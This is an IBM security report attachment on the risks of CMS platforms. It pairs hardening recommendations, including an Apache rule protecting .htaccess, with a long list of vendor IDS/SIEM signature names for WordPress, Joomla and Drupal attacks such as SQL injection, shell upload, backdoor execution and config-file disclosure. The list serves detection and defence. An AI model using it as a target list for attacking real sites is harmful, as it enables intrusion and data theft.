RESEARCH AND INTELLIGENCE REPORT
RELEASE DATE: FEBRUARY 26, 2015
BY: DAVID MCMILLEN, SENIOR THREAT RESEARCHER, IBM MSS
THE RISKS OF CONTENT MANAGEMENT SYSTEMS: ATTACHMENT #1

©Copyright IBM Corporation 2014. All rights reserved. IBM and the IBM logo are trademarks or registered trademarks of the IBM Corporation in the United States, other countries or both. Other company, product or service names may be trademarks or service marks of others.

TABLE OF CONTENTS

RECOMMENDATIONS/MITIGATION TECHNIQUES

IDPS SIGNATURES AND/OR SIEM RULES
    Akamai
    Checkpoint
    Cisco ASA
    Cisco IDS
    Fortinet
    IBM
    Intrushield
    ISS
    McAfee
    Netscreen
    Palo Alto
    Snort
    Sourcefire
    Tipping Point
    Trendmicro

DISCLAIMER


RECOMMENDATIONS/MITIGATION TECHNIQUES

Always run the latest version of any CMS.

Update CMS systems regularly. Look specifically for vulnerability patches and bug fixes.

Always use trusted sources for themes and plugins. Never use free themes and plugins.

Never use default settings. Change the default “ADMIN” name. Rename default database prefixes to prevent SQL Injection.

Reduce credentials. The administrator account should only be needed for performing updates or adding/changing themes and plugins. Those who edit posts or write articles should never need to be at an administrator level.

Always utilize strong passwords.

Protect the .htaccess file. The following code, added within the .htaccess file, will prevent anyone from reading or writing any files that begin with “hta” (see “Securing .htaccess” in the References section).

Use a cloud-based security service. Solutions such as Cloudflare and Akamai act as a shield in front of your website. These services block bad user agents and offer some protection against SQL Injection and DDoS attacks.

Back up your CMS installations at regular intervals and design a robust disaster recovery plan.
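One way to implement the .htaccess protection recommended above, as an added example and not the report's own snippet: the directive denies HTTP access to every file whose name begins with ".hta". It assumes Apache httpd (2.2 or 2.4) and that AllowOverride permits these directives in the site directory; both are assumptions, not something the report states.

```apache
# Added example (not from the report): block web access to .htaccess,
# .htpasswd and stray copies such as .htaccess.bak. Put this in the site's
# .htaccess file or directly in the server configuration.

# Apache httpd 2.4: mod_authz_core is always present, so this branch is taken.
<IfModule mod_authz_core.c>
    <FilesMatch "^\.hta">
        Require all denied
    </FilesMatch>
</IfModule>

# Apache httpd 2.2: mod_authz_core does not exist, so the legacy syntax is used.
<IfModule !mod_authz_core.c>
    <FilesMatch "^\.hta">
        Order allow,deny
        Deny from all
        Satisfy All
    </FilesMatch>
</IfModule>
```

This only governs requests served over HTTP; local read and write access to the file is controlled by filesystem permissions and the account the web server runs as, so pair it with restrictive file modes. A quick check is that `curl -I https://example.com/.htaccess` (placeholder host) returns 403 rather than 200.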

IDPS SIGNATURES AND/OR SIEM RULES

AKAMAI

Detect Attempts to Access the Wordpress Pingback API

CHECKPOINT

Fast Wordpress Index Changer

Joomla and Wordpress Mass Defacer Tool

W3-Total-Cache Wordpress-plugin Username and Hash Extract

Wordpress Ajax Store Locator Arbitrary File Download

WordPress Backdoor iz Parameter Passthru - Ver2


WordPress Complete Gallery Manager Plugin Arbitrary Code Execution - Ver2

Wordpress Download Manager Plugin Arbitrary File Upload

WordPress FancyBox Plugin Code Injection

WordPress Gmedia Gallery Shell Upload

WordPress HTTP Brute Force Login Attempt

WordPress MailPoet Newsletters Unauthenticated File Upload

Wordpress Mini Mail Dashboard Widget Remote File Inclusion

WordPress OptimizePress Theme File Upload Remote Code Execution

WordPress Pingback Distributed Denial of Service

WordPress Plugin AdRotate SQL Injection

WordPress Plugin Google Document Embedder Arbitrary File Disclosure

WordPress RSS Feed Generator self_link HTTP_HOST Cross Site Scripting

WordPress RSS feed Generator self_link HTTP_HOST Cross-Site Scripting

WordPress Slider Revolution Plugin Local File Inclusion

WordPress Symposium Plugin Unauthenticated Shell Upload

Wordpress Timthumb WebShot Vulnerability Code Execution

Wordpress Top Quark Architecture Arbitrary File Upload Code Execution

WordPress VideoWhisper Live Streaming Integration Plugin Unrestricted File Upload

Wordpress W3 Total Cache PHP Code Execution

Joomla and Wordpress Mass Defacer Tool

Joomla Community com_comprofiler SQL Injection

Joomla Component com_5starhotels SQL Injection

Joomla Component com_acooldebate Local File Inclusion

Joomla Component com_acprojects SQL Injection

Joomla Component com_acstartseite SQL Injection

Joomla Component com_acteammember SQL Injection

Joomla Component com_adsmanager Remote File Inclusion

Joomla Component com_ajaxchat Remote File Inclusion

Joomla Component com_alameda SQL Injection

Joomla Component com_artlinks Remote File Inclusion

Joomla Component com_avosbillets SQL Injection

Joomla Component com_beamospetition Remote SQL Injection

Joomla component com_bearleague SQL Injection

Joomla Component com_bfsurvey Local File Inclusion

Joomla Component com_biblestudy Local File Inclusion

Joomla Component com_billyportfolio SQL Injection

Joomla Component com_books SQL Injection

Joomla Component com_brightweblinks SQL Injection

Joomla Component com_cartweberp Local File Inclusion

Joomla Component com_category SQL Injection


Joomla Component com_ccnewsletter Local File Inclusion

Joomla Component com_ckforms Local File Inclusion

Joomla Component com_clan SQL Injection

Joomla Component com_clanlist SQL Injection

Joomla Component com_communitypolls Local File Inclusion

Joomla Component com_contact Info SQL Injection

Joomla Component com_content SQL Injection

Joomla Component com_dailymeals Local File Inclusion

Joomla Component com_dashboard Directory Traversal

Joomla Component com_dateconverter SQL Injection

Joomla Component com_dbquery Remote File Inclusion

Joomla Component com_digifolio SQL Injection

Joomla Component com_doqment SQL Injection

Joomla Component com_dshop SQL Injection

Joomla Component com_DTRegister Remote SQL Injection

Joomla Component com_equipment SQL Injection

Joomla Component com_equotes Remote SQL Injection

Joomla component com_estateagent SQL Injection

Joomla Component com_event Multiple vulnerability

Joomla Component com_expshop SQL Injection

Joomla Component com_ezautos SQL Injection

Joomla Component com_ezine Remote File Inclusion

Joomla Component com_ezstore Remote SQL Injection

Joomla component com_fastball SQL Injection

Joomla Component com_flippingBook SQL Injection

Joomla Component com_galeria SQL Injection

Joomla Component com_ganalytics Local File Inclusion

Joomla Component com_gcalendar Remote SQL Injection

Joomla Component com_gigcal SQL Injection

Joomla Component com_gurujibook SQL Injection

Joomla Component com_hmcommunity SQL Injection

Joomla Component com_huruhelpdesk SQL Injection

Joomla Component com_ice SQL Injection

Joomla Component com_idoBlog Remote SQL Injection

Joomla Component com_ignitegallery SQL Injection

Joomla Component com_ijoomla_archive SQL Injection

Joomla Component com_img Local File Inclusion

Joomla Component com_ionfiles File Disclosure

Joomla component com_iproperty SQL Injection

Joomla Component com_jabode Remote SQL Injection


Joomla Component com_janews Local File Inclusion

Joomla Component com_jashowcase Remote SQL Injection

Joomla Component com_jbudgetsmagic SQL Injection

Joomla Component com_jeauto Local File Inclusion

Joomla Component com_jeemasms Multiple vulnerability

Joomla Component com_jefaqpro SQL Injection

Joomla Component com_jejob SQL Injection

Joomla Component com_jepoll SQL Injection

Joomla Component com_jequoteform Local File Inclusion

Joomla Component com_jgen SQL Injection

Joomla Component com_Jobline SQL Injection

Joomla Component com_joomlaDate SQL Injection

Joomla Component com_joomlaradio Remote File Inclusion

Joomla Component com_joomnik SQL Injection

Joomla Component com_jotloader SQL Injection

Joomla Component com_jpad SQL Injection

Joomla Component com_jphoto SQL Injection

Joomla Component com_jpodium SQL Injection

Joomla component com_jp_jobs SQL Injection

Joomla Component com_jradio Local File Inclusion

Joomla Component com_jsjobs SQL Injection

Joomla Component com_kochsuite Remote File Inclusion

Joomla Component com_linkdirectory Remote File Inclusion

Joomla Component com_linkr Local File Inclusion

Joomla Component com_listing SQL Injection

Joomla Component com_liveticker SQL Injection

Joomla Component com_lyftenbloggie Remote SQL Injection

Joomla Component com_mambowiki Remote File Inclusion

Joomla Component com_marketplace SQL Injection

Joomla Component com_markt SQL Injection

Joomla Component com_mdigg SQL Injection

Joomla Component com_mojo Remote File Include

Joomla Component com_netinvoice SQL Injection

Joomla Component com_newsflash Remote SQL Injection

Joomla Component com_obSuggest Local File Inclusion

Joomla Component com_otzivi Local File Inclusion

Joomla Component com_ownbiblio SQL Injection

Joomla Component com_oziogallery SQL Injection

Joomla Component com_pccookbook Remote File Inclusion

Joomla Component com_people Local File Inclusion


Joomla Component com_performs Remote File Inclusion

Joomla Component com_phocadocumentation Remote SQL Injection

Joomla Component com_phocagallery SQL Injection

Joomla Component com_photoblog alpha 3 SQL Injection

Joomla Component com_photoblog SQL Injection

Joomla component com_ponygallery SQL Injection

Joomla Component com_portfol SQL Injection

Joomla Component com_prayercenter SQL Injection

Joomla Component com_productbook SQL Injection

Joomla Component com_projectfork Local File Inclusion

Joomla Component com_qcontacts SQL Injection

Joomla Component com_quickfaq SQL Injection

Joomla Component com_realestatemanager Remote File Inclusion

Joomla Component com_redshop SQL Injection

Joomla Component com_rokdownloads Local File Inclusion

Joomla Component com_rsappt_pro2 Local File Inclusion

Joomla Component com_rsfiles Directory traversal

Joomla Component com_rwcards Local File Inclusion

Joomla Component com_s5clanroster SQL Injection

Joomla Component com_sectionex Local File Inclusion

Joomla Component com_seminar SQL Injection

Joomla Component com_simpleshop SQL Injection

Joomla Component com_simple_review Injection SQL Injection

Joomla Component com_spidercalendar SQL Injection

Joomla Component com_team SQL Injection

Joomla Component com_techfolio SQL Injection

Joomla Component com_tupinambis SQL Injection

Joomla Component com_virtuemart SQL Injection

Joomla Component com_webring Remote File Inclusion

Joomla Component com_wmtpic SQL Injection

Joomla Component com_xevidmegahd Remote SQL Injection

Joomla Component com_xewebtv SQL Injection

Joomla Component com_xgallery Local File Inclusion

Joomla Component com_xmovie Local File Inclusion

Joomla Component com_ybggal SQL Injection

Joomla Component com_yellowpages SQL Injection

Joomla Component com_youtube SQL Injection

Joomla Component com_yvcomment SQL Injection

Joomla Component ds_syndicate SQL Injection

Joomla Component JE Media Player Arbitrary File Upload


Joomla Component jeeventcalendar SQL Injection

Joomla Component JESectionFinder Directory traversal

Joomla Component Jw_allVideos Remote File Download

Joomla Component Scriptegrator File Inclusion

Joomla com_casino_blackjack SQL Injection

Joomla com_joomgalaxy SQL Injection

Joomla com_na_newsdescription SQL Injection

Joomla Content Editor Malicious User Agent Code Execution

Joomla DJ Classifieds SQL Injection

Joomla Media Manager File Upload Code Execution

Joomla ofc_upload_image.php Unrestricted File Upload

Joomla Remote File Inclusion

Joomla Unauthorized File Upload Remote Code Execution

Joomla Webring Component adminwebringdocsphp component_dir Parameter PHP Code Execution - Ver2

Joomla! HTTP-Referrer XSS

Joomla! Jobline Component 'search' Parameter SQL Injection

Joomla! JomSocial Input Validation Remote Code Execution

Joomla! Path Traversal

Web Servers Joomla Remote File Inclusion

Dries Buytaert Drupal Core OpenID Module Information Disclosure

Drupal Core XML-RPC Endpoint xmlrpc.php Internal Entity Expansion Denial of Service

Drupal Core XML-RPC Endpoint xmlrpc.php Tags Denial of Service

CISCO ASA

WordPress Installation Brute Forcing Attempt

WordPress OptimizePress Theme File Upload Vulnerability

Joomla 1.5.12 TinyBrowser File Upload Code Execution

Joomla Media Manager File Upload

CISCO IDS

WordPress Cookie cache_lastpostdate Overflow

HTTP WordPress Colormix Theme Cross Site Scripting Vulnerability

Newsletter Plugin For Wordpress Cross-Site Scripting Vulnerability

NextGEN Gallery Plugin For WordPress Json.php Path Disclosure Vulnerability

Rlswordpresssearch Plugin For Wordpress Register.Php SQL Injection Vulnerability

Snazzy Archives Plugin For Wordpress Tagcloud.Swf Cross-Site Scripting Vulnerability

WordPress 2.1.1 Backdoor IX Parameter Injection Detection

WordPress 2.1.1 Backdoor IZ Parameter Injection Detection

WordPress ABC Test Plugin Id Parameter XSS Vulnerability


WordPress Age Verification Plugin Redirect_to Parameter URI Redirection Vulnerability

WordPress Ambience Theme Src Parameter Cross Site Scripting Vulnerability

Wordpress Attack Scanner Plugin For Wordpress Path Information Disclosure Vulnerability

WordPress Bradesco Gateway Plugin Cross Site Scripting Vulnerability

WordPress Caching Plugins Remote PHP Code Execution

WordPress Category Grid View Gallery Plugin ID Parameter Cross-Site Scripting Vulnerability

WordPress Chocolate WP Theme Cross Site Scripting Vulnerability

WordPress Church_Admin Id Parameter XSS Vulnerability

WordPress Ck-processkarma.php Security Bypass Vulnerability

WordPress Ck-processkarma.php SQL Injection Vulnerability

WordPress Comment Extra Fields Plugin Cross Site Scripting Vulnerability

WordPress CommentLuv Plugin _ajax_nonce Parameter Cross-Site Scripting Vulnerability

WordPress Cookie cache_lastpostdate Overflow

WordPress Count Per Day Plugin Counter.php CSRF Vulnerability

WordPress Count Per Day Plugin Datemin Parameter XSS Vulnerability

WordPress Count Per Day Plugin Page Parameter XSS Vulnerability

WordPress Crayon Syntax Highlighter Wp_load Remote File Include

WordPress Cross Site Request Forgery Vulnerability

WordPress Cross Site Scripting Vulnerability

Wordpress Cross-Site Request Forgery

WordPress Denial of Service Vulnerability

WordPress Design Approval System Plugin XSS Vulnerability

WordPress Duplicator Plugin Cross-Site Scripting Vulnerability

WordPress Easy Webinar Plugin Wid Parameter SQL Injection

WordPress FAQs Manager Plugin Admin-ajax.php Cross-Site Scripting Vulnerability

WordPress Featurific For WordPress Plugin Snum Parameter XSS Vulnerability

WordPress Feedweb Plugin Wp_post_id Parameter Cross Site Scripting Vulnerability

WordPress FlagEm Plugin CID Parameter Cross Site Scripting Vulnerability

WordPress Flashnews Theme Src Parameter DoS

WordPress Flashnews Theme Src Parameter Remote Code Execution

WordPress Flashnews Theme Src Parameter XSS Vulnerability

WordPress Flashnews Theme Test.php Parameter XSS Vulnerability

WordPress Floating Tweets Plugin Directory Traversal

WordPress Floating Tweets Plugin Full Path Disclosure

WordPress Floating Tweets XSS Vulnerability

WordPress Foxypress Plugin Cross Site Request Forgery

WordPress Foxypress Plugin HTML Injection

WordPress Foxypress Plugin Information Disclosure

WordPress G-Lock Double Opt-In Manager Plugin SQL Injection

WordPress Gallery Plugin Filename_1 Parameter Remote Arbitrary File Access Vulnerability


Wordpress HD Webplayer Plugin Config.php SQL Injection

Wordpress HD Webplayer Plugin Config.php SQL Injection Vulnerability

WordPress Host Header Processing Cross-Site Scripting

WordPress IndiaNIC Cross Site Request Forgery Vulnerability

Wordpress Indianic Faqs Manager Plugin 1.0 XSRF Vulnerability

Wordpress Indianic Faqs Manager Plugin 1.0 XSS Vulnerability

Wordpress InfusionSoft Plugin Upload

WordPress Installation Brute Forcing Attempt

WordPress Integrator Redirect_to Parameter Cross-Site Scripting Vulnerability

WordPress Mb.MiniAudioPlayer Plugin Cross Site Scripting Vulnerability

WordPress Monsters Editor For WP Super Edit Plugin Arbitrary File Upload Vulnerability

WordPress Newsletter Preview.php File Disclosure Vulnerability

WordPress Notices Ticker Plugin Cross Site Request Forgery

WordPress OptimizePress Theme File Upload Vulnerability

WordPress Pinboard Theme Tab Parameter Cross Site Scripting Vulnerability

WordPress Pingback Denial of Service Attack

WordPress Platinum SEO XSS Vulnerability

Wordpress Podpress Plugin Playerid Parameter Cross Site Scripting Vulnerability

WordPress Portable phpMyAdmin Plugin Authentication Bypass

WordPress Pretty Link Plugin XSS Vulnerability

WordPress ProPlayer Plugin Id Parameter SQL Injection

WordPress Rich Widget Plugin Arbitrary File Upload Vulnerability

WordPress RokNewsPager Denial of Service

WordPress RokNewsPager Plugin XSS

WordPress Sahifa Theme Cross Site Request Forgery Vulnerability

WordPress Securimage-WP Plugin Siwp_test.php Cross Site Scripting Vulnerability

WordPress Sharebar Cross Site Scripting Vulnerability

Wordpress Slideshow Plugin Cross Site Scripting Vulnerability

Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerability

WordPress Smart Flv Plugin Cross Site Scripting Vulnerability

WordPress SolveMedia 1.1.0 Cross Site Request Forgery

WordPress Spicy Blogroll Plugin Remote File Include Vulnerability

WordPress Spider Catalog Plugin AllImagesQ Cross Site Scripting Vulnerability

WordPress TimThumb Plugin Cross Site Scripting Vulnerability

WordPress Token Manager Plugin Tid Parameter XSS Vulnerability

WordPress Traffic Analyzer Plugin aoid Parameter XSS Vulnerability

WordPress Video Lead Form Plugin ErrMsg Parameter XSS Vulnerability

WordPress Webplayer Plugin ID Parameter SQL Injection

WordPress WP Socializer Val Parameter XSS Vulnerability

WordPress Wp-ImageZoom File Parameter Remote File Disclosure Vulnerability


WordPress Wp-ImageZoom Theme ID Parameter SQL Injection

WordPress WP-SendSMS Plugin Cross Site Request Forgery Vulnerability

WordPress WP-Table Reloaded Plugin ID Parameter Cross Site Scripting Vulnerability

WordPress Wysija Newsletters Plugin SQL Injection

Wordpress Zeroclipboard.Swf Cross Site Scripting Vulnerability

Googlemaps Joomla! Pluging Cross-Site Scripting Vulnerability

Googlemaps Plugin For Joomla! Plugin_Googlemap3_Kmlprxy.Php DOS Vulnerability

Joomla 1.5 Password Token Bypass

Joomla 1.5.12 TinyBrowser File Upload Code Execution

Joomla Component JCE File Upload Remote Code Execution

Joomla Cross-Site Scripting Vulnerability

Joomla Media Manager File Upload

Joomla VirtueMart Component SQL Injection

Rsfiles Component For Joomla Cid Parameter SQL Injection Vulnerability

Drupal Core xmlrpc.php Internal Entity Expansion Denial of Service

FORTINET

WordPress.Slider.Revolution.File.Inclusion

Backdoor.WordPress.ix.Code.Execution

Backdoor.WordPress.iz.Command.Execution

Cafe.Wordpress.SQL.Injection

FeedList.Plugin.for.WordPress.Parameter.XSS

FireStats.WordPress.Plugin.Multiple.XSS.Authentication.Bypass

Fuctweb.CapCC.Plugin.For.WordPress.CAPTCHA.Security.Bypass

PHP.phpWordPress.SQL.Injection

PHP.WordPress.Cookie.Data.Code.Injection

Pretty.Link.Lite.WordPress.Plugin.Cross.Site.Scripting.Vuln

Twitter.Feed.for.WordPress.Plugin.XSS.Vulnerability

web_app: PHP.phpWordPress.SQL.Injection

web_app: PHP.phpWordPress.Sql.Injection.A

WordPress.Advance.Dewplayer.Plugin.Information.Disclosure.Vuln

WordPress.All-in-One.Event.Calendar.Plugin.XSS.Vulnerabilities

WordPress.AllWebMenus.Plugin.Remote.File.Inclusion.Vuln

WordPress.Asset.Manager.Plugin.Arbitrary.File.Upload

WordPress.BackWPup.Plugin.Directory.Traversal.Vulnerabilities

WordPress.Booking.System.Plugin.SQL.Injection.Vulnerability

WordPress.Calendar.Plugin.Cross-Site.Request.Forgery.Vuln

WordPress.cformsII.Plugin.rs.and.rsargs.XSS

WordPress.Code.SQL.Injection


WordPress.Complete.Gallery.Manager.plugin.Arbitrary.File.Upload

WordPress.Contact.Bank.Plugin.Label.Tag.HTML.Injection.Vuln

WordPress.Content.Slide.Plugin.Cross-site.Request.Forgery.Vulne

WordPress.Contextual.Related.Posts.Plugin.Cross-Site.Vuln

Wordpress.Count-Per-Day.Plugin.Directory.Traversal.Vuln

Wordpress.Count.per.Day.Plugin.Multiple.XSS.Vulns

WordPress.Count.Per.Day.Plugin.XSS

WordPress.Cross-site.Request.Forgery.Vulnerability

WordPress.CSS.Style.Cross-Site.Scripting.Vulnerability

Wordpress.Default.Theme.Admin.XSS

WordPress.Digg-Digg.Plugin.Cross-Site.Request.Forgery.Vuln

Wordpress.Download.Manager.Unauthenticated.File.Upload

WordPress.Download.Manager.wpdm_upload_icons.Code.Execution

WordPress.Fast.Secure.Contact.Form.Plugin.URL.Cross-Site.Script

WordPress.File.Upload.Script.Insertion.Vulnerabilities

Wordpress.Forums.Plugin.File.Disclosure.Vulnerability

WordPress.Foxypress.Plugin.Arbitrary.File.Upload

WordPress.Foxypress.Plugin.Uploadify.Arbitrary.File.Upload

Wordpress.Gallery.Plugin.File.Inclusion.Vulnerability

WordPress.Information.Disclosure

Wordpress.InfusionSoft.Code.Generator.PHP.Code.Injection

Wordpress.is_human.Plugin.Remote.Command.Injection

WordPress.Jetpack.Plugin.Security.Bypass.Vulnerability

WordPress.jRSS.Widget.url.Parameter.Information.Disclosure

WordPress.KSES.Multiple.Cross-site.Scripting.Vulnerabilities

WordPress.LeagueManager.Plugin.SQL.Injection

Wordpress.Login.Brute.Force

Wordpress.Mac.Photo.Gallery.Plugin.Arbitrary.File.Upload

WordPress.Mail.On.Update.Plugin.Cross-Site.Request.Forgery.Vuln

Wordpress.MailPoet.Newsletters.Unauthenticated.File.Upload

WordPress.MailPoet/WYSIJA.Newsletters.Remote.File.Upload.Vuln

WordPress.mb.miniAudioPlayer.Plugin.XSS.Vulnerabilities

WordPress.META-Generator.Header.Indicates.Vulnerable.Version

Wordpress.MM.Forms.Community.Plugin.Arbitrary.File.Upload

WordPress.MobileChief.Plugin.Cross-Site.Scripting.Vulnerability

WordPress.MU.Prior.to.2.7.Cross-site.Scripting.Vuln

WordPress.Multiple.Security.Vulnerabilities

WordPress.Multiple.Themes.Cross-site.Scripting.Vulnerabilities

Wordpress.Multiple.Vulnerabilities

WordPress.myEASYbackup.Plugin.Directory.Traversal.Vulnerability


Wordpress.Newsletter.Plugin.Cross-site.Scripting.Vulnerability

WordPress.Newsletter.Preview.php.File.Disclosure

WordPress.Occasions.Plugin.XSS

WordPress.OptimizePress.Theme.Arbitrary.File.Upload

Wordpress.Page-Flip-Image-Gallery.Plugins.Arbitrary.File.Upload

WordPress.Participants.Database.Plugin.SQL.Injection.Vuln

WordPress.Photo.Album.Plus.Error.Log.XSS

Wordpress.PHP.Application.XSS

Wordpress.Pica.Photo.Gallery.Plugin.Arbitrary.File.Upload

WordPress.Platinum.SEO.Pack.Plugin.s.Parameter.XSS.Vuln

WordPress.Plugin.Advanced.Custom.Fields.Remote.File.Inclusion

WordPress.Plugin.BackWPup.Remote.File.Inclusion.Vulnerability

WordPress.Plugin.Comment.Rating.id.Parameter.SQL.Injection

WordPress.Plugin.DZS.Video.Gallery.File.Disclosure

WordPress.Plugin.GDE.Arbitrary.File.Disclosure

WordPress.Plugin.Sniplets.File.Inclusion

WordPress.Plugin.W3.Total.Cache.Remote.PHP.Code.Execution

Wordpress.Poll.Plugin.SQL.Injection.Vulnerability

Wordpress.Portable.PHPmyadmin.Auth.Bypass.Vulnerability

WordPress.post.php.XSS

Wordpress.Posts.SQL.Injection.Vulnerability

WordPress.Privileges.Multiple.Information.Disclosure.Vuln

WordPress.Processing.Embed.Plugin.Cross-site.Scripting.Vuln

WordPress.Property.Plugin.Arbitrary.File.Upload

WordPress.Quick.Page/Post.Redirect.Plugin.Multiple.Vuln

WordPress.Related.Posts.by.Zemanta.Plugin.Cross.Site.Vuln

WordPress.Related.Posts.Plugin.Cross-Site.Request.Vuln

Wordpress.Reset.Password.Security.Bypass

WordPress.RSS.Feed.Generator.self_link.HTTP_HOST.XSS

WordPress.RSS.Feed.Reader.Plugin.Cross-site.Scripting.Vuln

WordPress.RSS.META-Generator.Header.Indicates.Is.Vulnerable

WordPress.S3.Video.Plugin.Cross-Site.Scripting.Vulnerability

WordPress.Safe.Search.Plugin.Cross-site.Scripting.Vulnerability

WordPress.Security.Bypass.And.Unspecified.Vulnerabilities

WordPress.Simply.Poll.Plugin.XSS

WordPress.Slider.Revolution.File.Inclusion

Wordpress.Spicy.Blogroll.Plugin.Remote.File.Inclusion

WordPress.Stream.Video.Player.Plugin.CSRF.Vulnerability

WordPress.template.functions.category.SQL.Injection

WordPress.Theme.Tuner.Plugin.Remote.File.Inclusion.Vuln

Wordpress.TimThumb.PHP.Command.Injection

WordPress.TinyMCE.Color.Picker.Plugin.XSS.and.Bypass.Vuln

WordPress.Tinymce.Thumnail.Gallery.Plugin.File.Disclosure

WordPress.Traffic.Analyzer.Plugin.aoid.Parameter.XSS.Vuln

Wordpress.Unauthenticated.Administrator.Password.Reset

Wordpress.User.Enumeration.Brute.Forcer

WordPress.user_login.Column.SQL.Truncation.Vuln

WordPress.wp-admin.and.admin.php.Module.Conf.Security.Bypass

WordPress.wp-config.php.Backup.Is.Readable

WordPress.wp-config.php.NumberSign.Backup.Is.Readable

WordPress.wp-content.plugins.Directory.is.Listable

WordPress.WP-Cumulus.Plugin.tagcloud.swf.XSS

WordPress.WP-Forum.Plugin.Multiple.SQL.Injections

Wordpress.Wp-login.PHP.HTTP.Response.Splitting.Vuln

WordPress.WP-Syntax.Plugin.Remote.Code.Execution

WordPress.WP.Banners.Lite.Plugin.XSS

WordPress.WP.Custom.Pages.Plugin.Directory.Traversal.Vuln

WordPress.Wp.Download.Manager.Arbitrary.File.Upload

WordPress.WP.E.Commerce.Plugin.cart.message.XSS

WordPress.Wp.ImageZoom.file.Parameter.File.Disclosure

Wordpress.WP.Marketplace.Plugin.Arbitrary.File.Upload

WordPress.WP.Symposium.Arbitrary.File.Upload

WordPress.WP.Symposium.Plugin.Cross-site.Scripting.Vuln

Wordpress.wp.trackback.SQL.Injection

WordPress.WP.Ultimate.Email.Marketer.Plugin.Multiple.Vulns

Wordpress.wpStoreCart.Plugin.Arbitrary.File.Upload

Wordpress.wpStoreCart.Plugin.Unrestricted.File.Upload.Vuln

WordPress.Wptitle.XSS

Wordpress.WPTouch.Authenticated.File.Upload

WordPress.WPtouch.Plugin.Cross-site.Scripting.Vulnerability

WordPress.XML-RPC.Remote.Publishing.Interface.Security.Vuln

Wordpress.Xml.Quadratic.Blowup.DoS

WordPress.xmlrpc.php.wp.getUsersBlogs.Brute.Force

WordPress.xmlrpc.Pingback.DoS

WordPress.XSS.HTML.Injection.SQL.Injection

WordPress.XSS.SQL.Injection

WordPress.XSS.Vulnerability

Wordpress_File.Upload

WP-Forum.WordPress.Plugin.Multiple.SQL.Injection

Yoast.Google.Analytics.For.WordPress.Plugin.XSS

Acajoom.Component.for.Joomla.3.2.6.Backdoor

Agile.Joomla.Components.Parameter.Local.File.Inclusion

AvReloaded.Plugin.for.Joomla!.SQL.Injection.Vulnerability

EOL.Software.Joomla!.1.5.x.Detected

Huru.Helpdesk.Joomla.Component.cid.Parameter.SQL.Injection.Vuln

Joomla!.1.5.Multiple.Vulnerabilities

Joomla!.1.5.Password.Reset.Vulnerability

Joomla!.1.6.Multiple.Cross-Site.Scripting.Vulnerabilities

Joomla!.1.6.Multiple.Vulnerabilities

Joomla!.administrator.Section.Information.Disclosure.Vuln

Joomla!.AJAX.Shoutbox.Component.jal_lastID.SQL.Injection.Vuln

Joomla!.AlphaRegistration.Component.SQL.Injection

Joomla!.and.Mambo.gigCalendar.Component.SQL.Injection.Vuln

Joomla!.BF.Survey.Pro.Component.SQL.Injection.Vulnerability

Joomla!.Blind.SQL.Injection.Vulnerability

Joomla!.com_contact.Cross-site.Scripting.Vulnerability

Joomla!.com_contact.Multiple.Cross-site.Scripting.Vuln

Joomla!.com_jsjobs.Component.Multiple.SQL.Injection.Vuln

Joomla!.Cross-Site.Scripting.Vulnerability

Joomla!.eXtplorer.Component.Cross-site.Scripting.Vuln

Joomla!.GCalendar.Component.SQL.Injection.Vulnerability

Joomla!.GigCalendar..Component.SQL.Injection.Vulnerability

Joomla!.Google.Maps.Plugin.Multiple.Vulnerabilities

Joomla!.Host.HTTP.Header.Cross.Site.Scripting.Vulnerability

Joomla!.Information.Disclosure.Vulnerability

Joomla!.ja_purity.Cross-site.Scripting.Vulnerability

Joomla!.JA_Purity.Template.XSS.Vulnerability

Joomla!.Jumi.Component.SQL.Injection.Vulnerability

Joomla!.JV.Comment.Component.id.Parameter.SQL.Injection.Vuln

Joomla!.JVideo!.Component.SQL.Injection.Vulnerability

Joomla!.Komento.Component.Multiple.XSS.Vuln

Joomla!.Language.Switcher.Module.Cross-site.Scripting.Vuln

Joomla!.Multi.Calendar.Component.Cross-site.Scripting.Vuln

Joomla!.Multiple.Cross-Site.Scripting.Vulnerabilities

Joomla!.Multiple.Information.Disclosure.Vulnerabilities

Joomla!.ordering.Parameter.Cross-site.Scripting.Vulnerability

Joomla!.Password.Change.and.Privilege.Escalation.Vuln

Joomla!.Prior.to.1.5.12.Multiple.Cross-site.Scripting.Vuln

Joomla!.Prior.to.2.5.5.Multiple.Vulnerabilities

Joomla!.Properties.Component.for.SQL.Injection.Vulnerability

Joomla!.remember.php.PHP.Object.Injection.Vulnerability

Joomla!.SQL.Injection.Vulnerability

Joomla!.Unauthorised.Upload.File.Vulnerability

Joomla!.Update.Manager.Cross-site.Scripting.Vulnerability

Joomla!.XStandard.Component.Directory.Traversal.Vulnerability

Joomla!.Youtube.Gallery.Component.videofile.XSS.Vuln

Joomla.Admin.Joomlaradiov5.PHP.File.Inclusion

Joomla.Akeeba.Kickstart.Unserialize.Remote.Code.Execution

Joomla.ArtForms.Multiple.SQL.Injection.Vulnerabilities

Joomla.Barter.Sites.Component.SQL.Injection.Vulnerability

Joomla.BF.Quiz.Component.SQL.Injection.Vulnerability

Joomla.Clickjacking.Security.Bypass.Vulnerability

Joomla.Com.User.Component.Password.Reset

Joomla.Component.RWCards.Remote.SQL.Injection

Joomla.com_jimtawl.Component.Local.File.Include.Vulnerability

Joomla.com_kp.Local.File.Include.Vuln

Joomla.com_maianmedia.Component.SQL.Injection.Vulnerability

Joomla.com_xobbix.component.SQL.Injection.Vuln

Joomla.Cross-site.Scripting.Multiple.Vulnerabilities

Joomla.Currency.Converter.Module.XSS.Vulnerability

Joomla.Estate.Agent.Component.SQL.Injection.Vulnerability

Joomla.Google.Maps.Plugin.DDOS

Joomla.highlight.php.Multiple.Remote.Vulnerabilities

Joomla.JCE.Extension.Remote.File.Upload

Joomla.language.Search.Component.Cross-Site.Scripting.Vuln

Joomla.Lyftenbloggie.XSS.Vulnerability

Joomla.Media.Manager.Arbitrary.File.Upload

Joomla.Multiple.SQL.Injection.Vulnerabilities

Joomla.Multiple.XSS.and.Information.Disclosure.Vulns

Joomla.Prior.to.1.6.4.Multiple.XSS

Joomla.RSfiles.Component.SQL.Injection

Joomla.searchword.Parameter.Process.Code.Injection

Joomla.Teams.Component.SQL.Injection.Vulnerability

Joomla.TinyBrowser.Multiple.Vulnerabilities

Joomla.TinyMCE.Arbitrary.File.Upload

Joomla.Upload.Code.Execution

Joomla.URI.Index.php.XSS

Joomla.Webring.Remote.File.Inclusion

Mambo.Joomla!Multiple.Components.Controller.Para.Local.File

Mambo.Joomla!Multiple.Components.View.Para.Local.File.Inclusion

Mambo.Joomla.DoS

